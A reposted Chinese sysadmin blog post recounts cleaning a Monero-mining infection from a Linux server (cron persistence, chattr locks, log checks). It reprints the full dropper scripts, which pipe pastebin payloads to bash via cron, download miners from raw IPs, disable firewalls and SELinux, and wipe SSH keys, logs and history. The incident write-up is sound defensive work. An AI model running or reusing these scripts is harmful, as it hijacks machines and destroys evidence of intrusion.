碼上歡樂
相關內容    簡體    繁體

挖礦病毒排查

本文轉載自   查看原文   2021-09-03 15:53   452    Linux

  公司服務器負載突然上來了,用top命令查看,發現了一個很詭異的進程;

  然后grep這個進程的進程號,發現是運行在/tmp/.solr/solrd下;於是趕緊殺進程,刪程序,負載就下來了;但是還沒有完,用top命令再次查看的時候驚奇的發現有一個solr.sh的腳本在執行,通過grep它的進程號,發現還是運行在tmp下,但是奇怪的是明明腳本在運行,但是在對應路徑下找不到該腳本,用find全局查找也找不到;為了不讓其繼續作惡,趕緊把進程殺了,在阿里雲控制台添加了安全組,只允許80,443的請求進來;

 

  這還沒有完,過一會,solr.sh腳本又開始運行了,但是正主solrd卻沒有運行;因該是由於端口限制程序包進不來了;於是趕緊做了如下措施:

1、修改服務器密碼;
2、檢查/etc/passwd、/etc/group文件有沒有不熟悉的用戶;
3、檢查計划任務,這一查不要緊,還真有東西;但是清除計划任務時,發現沒有權限,我可是root啊,開玩笑沒有權限;於是檢查了特殊權限,發現還真有,一個個清除了,又檢查了/etc/cron.d/、/etc/cron.daily/、/etc/cron.deny、/etc/cron.hourly/、/etc/cron.monthly/、/etc/crontab、/etc/cron.weekly/無一例外,都有計划任務,還都加了特殊權限;

[root@jira-wiki log]# crontab -l
*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash
[root@jira-wiki log]# crontab -r
/var/spool/cron/root: Operation not permitted
[root@jira-wiki log]# lsattr /var/spool/cron/
----ia-------e-- /var/spool/cron/root
[root@jira-wiki log]# chattr -ia /var/spool/cron/root
[root@jira-wiki log]# lsattr /var/spool/cron/
-------------e-- /var/spool/cron/root
[root@jira-wiki log]# chattr -e /var/spool/cron/root
[root@jira-wiki log]# lsattr /var/spool/cron/
---------------- /var/spool/cron/root
[root@jira-wiki log]#

4、用last查看最近登錄的用戶;
5、分析/var/log/messages、/var/log/secure日志

6、將chattr命令mv到其他地方,並修改名稱,位置只有管理員知道,並將/var/log/wtmp、/var/log/secure、/var/log/cronrot加-a特殊權限,否則這些日志被清理后很惡心;最后一定要清除mv chattr命令的痕跡別讓不法分子知道了你把chattr命令移動道理哪;

  當時把它的程序copy了一份,事后看了下其配置文件,其中有這么一段配置,訪問了下網址,發現是個叫門羅幣的礦池;百度了下,發現中招的人還不少;

    "pools": [
        {
            "algo": null,
            "coin": null,
            "url": "pool.supportxmr.com:80",
            "user": "4APyW6eriFEHcp4jVaGLP7eUVMV332fdrKn5iEqHcPjQMy1giyzy9phM2GrFYJ87eNEXJi3CqTaJYbfBVQWS22ke9ke9oVB",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "socks5": null,
            "self-select": null
        }
    ],

 最后我貼一下天殺的挖礦病毒在我服務器上干了啥,曝光它:

#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
killall /tmp/*
killall /tmp/.*
killall /var/tmp/*
killall /var/tmp/.*
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "T6hvUyQq" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/T6hvUyQq | sh"
  ) | crontab -
fi
rm -f /tmp/*
rm -f /tmp/.sola
s2=`whoami`
if [ `whoami` = "root" ];
then
    chattr -ia /etc/cron.d/*
    rm -rf /etc/cron.d/*
    chattr -i /var/spool/cron/crontabs/root
    chattr -i /usr/local/bin/dns
    rm -f /etc/cron.hourly/oanacroner
    rm -f /etc/cron.hourly/oanacrona
    rm -f /etc/cron.daily/oanacroner
    rm -f /etc/cron.daily/oanacrona
    rm -f /etc/cron.monthly/oanacroner
    rm -f /usr/local/bin/dns
    rm -f /etc/update.sh
    chattr -ia /etc/hosts
    echo >/etc/hosts
    chattr +ia /etc/hosts
    chattr -i /etc/sysupdate
    rm -f /etc/sysupdate
    rm -f /etc/config.json
    rm -f /var/tmp/kworkerds
    rm -f /usr/bin/.systemcero
    rm -f /usr/bin/cloudupdate
    rm -f /usr/bin/diskmanagerd
    rm -f /lib/libterminfo.so
    rm -f /bin/httpsntp
    rm -f /bin/ftpsntp
    rm -f /var/tmp/jspserv
    rm -f /usr/sbin/cron
    rm -f /usr/bin/kinsing*
    rm -f /etc/cron.d/kinsing*
    rm -f /usr/bin/node
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/crontab
    chattr +ia /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/cron.d/root
    chattr +ia /var/spool/cron/root
    chattr +ia /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
else
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|defunct\|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    pkill solr.sh
    pkill solrd
    ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
    chmod +rwx /tmp/.solr
    rm -rf /tmp/.solr
    mkdir /tmp/.solr
    curl -fsSL http://27.1.1.34:8080/docs/s/config.json -o /tmp/.solr/config.json
    curl -fsSL http://222.122.47.27:2143/auth/solrd.exe -o /tmp/.solr/solrd
    curl -fsSL http://27.1.1.34:8080/docs/s/solr.sh -o /tmp/.solr/solr.sh
    chmod +x /tmp/.solr/solrd
    chmod +x /tmp/.solr/solr.sh
    nohup /tmp/.solr/solr.sh &>>/dev/null &
    sleep 10
    rm -f /tmp/.solr/solr.sh
else
    exit
fi
#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin

setenforce 0 2>/dev/null
ulimit -n 65535
ufw disable
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F
echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf
sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
mv /usr/bin/ps.original /usr/bin/ps
netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep -v '.rsyslogds' | grep '/tmp' | grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
  SPATH=/usr/sbin
else
  SPATH=/tmp
fi
ipurl="http://107.172.214.23:1234"
$DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;/tmp/.rsyslogds;chattr +ai $SPATH/.rsyslogds
$DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
cd $SPATH/
nohup ./.inis 1>/dev/null 2>&1 &
chattr +ia $SPATH/.inis
history -c
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 挖礦病毒排查 Watchbog挖礦病毒程序排查過程 排查 Linux系統下SSH被暴力破解 植入pnscan 挖礦病毒入侵服務器 記服務器中招挖礦病毒排查過程(解決方案篇) 處理kdevtmpfsi挖礦病毒 挖礦病毒處理記錄 miner2 挖礦病毒 阿里雲中挖礦病毒 處理kdevtmpfsi挖礦病毒 kdevtmpfsi挖礦病毒處理
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM